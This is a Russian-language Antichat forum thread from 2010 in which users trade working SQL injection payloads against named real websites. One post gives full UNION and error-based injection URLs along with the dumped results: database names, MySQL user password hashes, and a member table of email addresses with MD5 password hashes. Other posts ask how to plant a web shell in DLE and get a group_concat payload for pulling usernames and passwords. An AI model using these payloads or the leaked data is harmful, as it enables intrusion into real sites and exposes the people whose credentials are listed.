Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.04.2010, 00:04
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Сообщение от jecka3000
очень прошу помощи, не выводит результат из столбцов.
http://amkar.properm.ru/info.php?id=-12+UNION+SELECT+concat_ws(unhex(hex(email,0x20,pas sword)))+from+0x6670705f6d656d62657273--
П.С. Вся информация в исходном коде, в таком виде,например: <br> <img src="graffiti/ warn_lastwarn"></p><p align = "center"><br>
мне же нужно вывести из таблы fpp_members столбцы name password email
не выводит, помогите) ммм... 
Код:
http://amkar.properm.ru/info.php?id=-999.9+or%281,1%29=%28select+count%280%29,concat%28%28select+concat%28database%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29
Version: 5.0.51a-24+lenny2-log
Current User: properm@localhost
Код:
Data Bases:
_muzik
amkar
amkar_fan
amore
avto
baba
bikini
comix
contests
euroset
forum
globass
klass
kvn
led
linkation
map
miss_whatever
miss_zima
moda
muzik
muzik_old
mysql
nebo
nevesta
newseater
permskoe
properm
reality
reality_backup
seolib
sf
spravka
spravka2
spravka_backup_2009_10_31
spravka_backup_2009_11_07
User:
'root'@'localhost'
'reality'@'localhost'
'realty'@'localhost'
'seo'@'localhost'
'sprvk'@'localhost'
'zabbix'@'localhost'
'spravka'@'localhost'
'properm'@'localhost'
'debian-sys-maint'@'localhost'
'root'@'proserv'
'alya'@'%'
'replication_user'@'%'
'remote_root'@'%'
MySQL DB
User Password
alya *8D43FE3D5955DD53B1156534EE7AD854CA88FF24
remote_root
replication_user *A1DAA5D16F63E661DFFE8FB7E5CCF0E235F0C601
debian-sys-maint *D6E3AC52927F6BD477ACFEB9E18DCCC3094FFF97
properm *C58CE76F735421EB5B5BC2BB332CEF2674661499
reality *66758BD9AE5EFE6F5EFD754A0386969808EE2991
realty *27D8E13E226CE3F3DB6116796584A6BCF2AA3305
root *966F8B69DCE8F1383221C7E89C8AB06697332DAC
seo *6063C78456BB048BAF36BE1104D12D547834DFEA
spravka *050376F3855A67F5E2C6514FD3130B31006C1276
sprvk *30763283C56FC465C0F1F869CD097A5ABDF1F4D9
zabbix *2D90A69B6136A8DE2E6B87DC14504CE500DA21CF
root *CAC83AB2E75198C3287CD7E81B808F9C6D54B41A
DATABASE: forum
(TABLES):
fpp_admin_logs
fpp_admin_sessions
fpp_badwords
fpp_cache_store
fpp_calendar_events
fpp_categories
fpp_contacts
fpp_css
fpp_email_logs
fpp_emoticons
fpp_faq
fpp_files
fpp_files_cats
fpp_files_comments
fpp_files_custentered
fpp_files_custfields
fpp_files_downloads
fpp_files_favorites
fpp_files_votes
fpp_forum_perms
fpp_forum_tracker
fpp_forums
fpp_groups
fpp_languages
fpp_macro
fpp_macro_name
fpp_member_extra
fpp_members
fpp_messages
fpp_moderator_logs
fpp_moderators
fpp_pfields_content
fpp_pfields_data
fpp_polls
fpp_posts
fpp_reg_antispam
fpp_search_results
fpp_sessions
fpp_skin_templates
fpp_skins
fpp_spider_logs
fpp_stats
fpp_subscription_currency
fpp_subscription_extra
fpp_subscription_logs
fpp_subscription_methods
fpp_subscription_trans
fpp_subscriptions
fpp_templates
fpp_titles
fpp_tmpl_names
fpp_topic_mmod
fpp_topics
fpp_tracker
fpp_validating
fpp_voters
fpp_warn_logs
ibf_admin_logs
ibf_admin_sessions
ibf_announcements
ibf_attachments
ibf_attachments_type
ibf_badwords
ibf_banfilters
ibf_bulk_mail
ibf_cache_store
ibf_calendar_events
ibf_conf_settings
ibf_conf_settings_titles
ibf_contacts
ibf_custom_bbcode
ibf_email_logs
ibf_emoticons
ibf_faq
ibf_forum_perms
ibf_forum_tracker
ibf_forums
ibf_groups
ibf_languages
ibf_mail_error_logs
ibf_mail_queue
ibf_member_extra
ibf_members
ibf_members_converge
ibf_message_text
ibf_message_topics
ibf_moderator_logs
ibf_moderators
ibf_pfields_content
ibf_pfields_data
ibf_polls
ibf_posts
ibf_reg_antispam
ibf_search_results
ibf_sessions
ibf_skin_macro
ibf_skin_sets
ibf_skin_templates
ibf_skin_templates_cache
ibf_spider_logs
ibf_subscription_currency
ibf_subscription_extra
ibf_subscription_logs
ibf_subscription_methods
ibf_subscription_trans
ibf_subscriptions
ibf_task_logs
ibf_task_manager
ibf_titles
ibf_topic_mmod
ibf_topics
ibf_topics_read
ibf_tracker
ibf_upgrade_history
ibf_validating
ibf_voters
ibf_warn_logs
Table: fpp_members
email password name test@localhost.com chucha pn@reaktive.ru 7277da89be64a89aa02a2d7423a0c05c Guest
red_ma@mail.ru 81dc9bdb52d04dc20036dbd8313ed055 Juissy
vsv1407@yandex.ru 1406e7afb3eb1f83b4bd4e310cee7fc6 magic
ca@properm.ru 287e9593819b2fcdf9945e7ccacd637d reaktive
pn@reaktive.ru 72fed2b8265919690c815f0316b346cc scbsncks
ve@properm.ru b0baee9d279d34fa1dfd71aadb908c3f wer
stasne@yandex.ru 48309aa13d9d9497b097495188b2863a Николай
|
|
|
17.04.2010, 14:31
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
посмотрел на phpinfo() там magic_quotes_gpc в local value ON а в master value OFF..
и теперь ON или OFF ??
|
|
|
|
17.04.2010, 15:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от LokbatanLi
посмотрел на phpinfo() там magic_quotes_gpc в local value ON а в master value OFF..
и теперь ON или OFF ??
http://forum.ixbt.com/topic.cgi?id=69:97
|
|
|
|
17.04.2010, 16:56
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
http://www.ticketing.ru/news.php?id=1022+order+by+100--
в данном месте интересует только раскрутка инклуда(!) расскажите что да как. Если тут это возможно
|
|
|
|
17.04.2010, 17:19
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Причем тут тогда SQl inj?
И вообще там просто нет подключаемого файла в директории.
На запрос не как не повлияешь.
|
|
|
|
17.04.2010, 21:59
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
какие есть способы заливки шелла в DLE ? подскажите, кто сталкивался, очень нужно  |
|
|
|
17.04.2010, 23:48
|
|
Познающий
Регистрация: 20.04.2007
Сообщений: 49
Провел на форуме:
234777
Репутация:
44
|
|
какие есть способы заливки шелла в DLE ? подскажите, кто сталкивался, очень нужно
версия даты?
|
|
|
|
18.04.2010, 00:12
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от jecka3000
http://www.ticketing.ru/news.php?id=1022+order+by+100--
в данном месте интересует только раскрутка инклуда(!) расскажите что да как. Если тут это возможно
там нет инклюда, просто файла нет необходимого.
|
|
|
|
18.04.2010, 00:18
|
|
Новичок
Регистрация: 04.01.2010
Сообщений: 24
Провел на форуме:
174204
Репутация:
24
|
|
Подскажите, что надо прописать чтобы инфу вытягивать со второй строки, а не с первой.
Например в этой sql:
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,concat(username,0x3a,pa ssword,0x3a,gid,0x3a,id)Gabriel,26,+from+jos_users +limit+1,1--
спасибо.
|
|
|
|
18.04.2010, 00:26
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555
Репутация:
226
|
|
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,group_concat(username,0 x3a,pa ssword,0x3a,gid,0x3a,id)Gabriel,26,+from+jos_users--
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.gif){kind=avatar}
![Аватар для [@p05]](/avatars/avatar35697.gif){kind=avatar}
Похожие темы
Линейный вид
